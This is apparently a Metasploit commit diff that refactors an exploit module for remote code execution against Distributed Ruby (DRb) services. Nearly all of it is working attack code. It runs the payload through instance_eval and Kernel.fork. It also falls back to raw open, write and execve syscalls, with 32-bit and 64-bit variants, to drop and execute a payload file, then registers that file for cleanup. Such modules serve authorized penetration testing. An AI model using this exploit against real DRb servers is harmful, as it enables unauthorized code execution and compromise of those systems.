Refactor module and use FileDropper

wvu · wvu · commit f0c89ffb56e5 · 2016-11-04T13:57:05.000-05:00
diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -7,8 +7,11 @@
 require 'drb/drb'
 
 class MetasploitModule < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
+
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
@@ -58,19 +61,37 @@ def exploit
     class << p
       undef :send
     end
+
+    case target.name
+    when 'instance_eval'
+      print_status('Trying to exploit instance_eval')
+      exploit_instance_eval(p)
+    when 'syscall'
+      print_status('Trying to exploit syscall')
+      exploit_syscall(p)
+    end
+  end
+
+  def exploit_instance_eval(p)
     begin
-      print_status('trying to exploit instance_eval')
       p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+    rescue SecurityError
+      print_error('instance_eval failed due to security error')
+    rescue DRb::DRbConnError
+      print_error('instance_eval failed due to connection error')
+    end
+  end
 
-    rescue SecurityError => e
-      print_status('instance eval failed, trying to exploit syscall')
-      filename = "." + Rex::Text.rand_text_alphanumeric(16)
-      begin
+  def exploit_syscall(p)
+    filename = "." + Rex::Text.rand_text_alphanumeric(16)
 
+    begin
+      begin
+        print_status('Attempting 32-bit exploitation')
         # syscall to decide wether it's 64 or 32 bit:
         # it's getpid on 32bit which will succeed, and writev on 64bit
         # which will fail due to missing args
-        j = p.send(:syscall,20)
+        p.send(:syscall,20)
         # syscall open
         i =  p.send(:syscall,8,filename,0700)
         # syscall write
@@ -82,13 +103,9 @@ class << p
         # syscall execve
         p.send(:syscall,11,filename,0,0)
 
-      # not vulnerable
-      rescue SecurityError => e
-
-        print_status('target is not vulnerable')
-
       # likely 64bit system
-      rescue => e
+      rescue Errno::EBADF
+        print_status('Target is a 64-bit system')
         # syscall creat
         i = p.send(:syscall,85,filename,0700)
         # syscall write
@@ -100,9 +117,17 @@ class << p
         # syscall execve
         p.send(:syscall,59,filename,0,0)
       end
+
+    # not vulnerable
+    rescue SecurityError
+      print_error('syscall failed due to security error')
+      return
+    rescue DRb::DRbConnError
+      print_error('syscall failed due to connection error')
+      return
     end
-    print_status("payload executed from file #{filename}") unless filename.nil?
-    print_status("make sure to remove that file") unless filename.nil?
-    handler(nil)
+
+    register_files_for_cleanup(filename)
   end
+
 end
